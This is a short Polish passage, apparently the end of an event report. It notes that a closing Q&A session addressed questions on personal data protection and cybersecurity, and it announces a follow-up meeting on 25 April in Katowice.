Kończąca sesja pytań i odpowiedzi pozwoliła rozwiać wszelkie wątpliwości dotyczące ochrony danych osobowych i cyberbezpieczeństwa. Kolejne spotkanie planowane jest 25 kwietnia w Katowicach.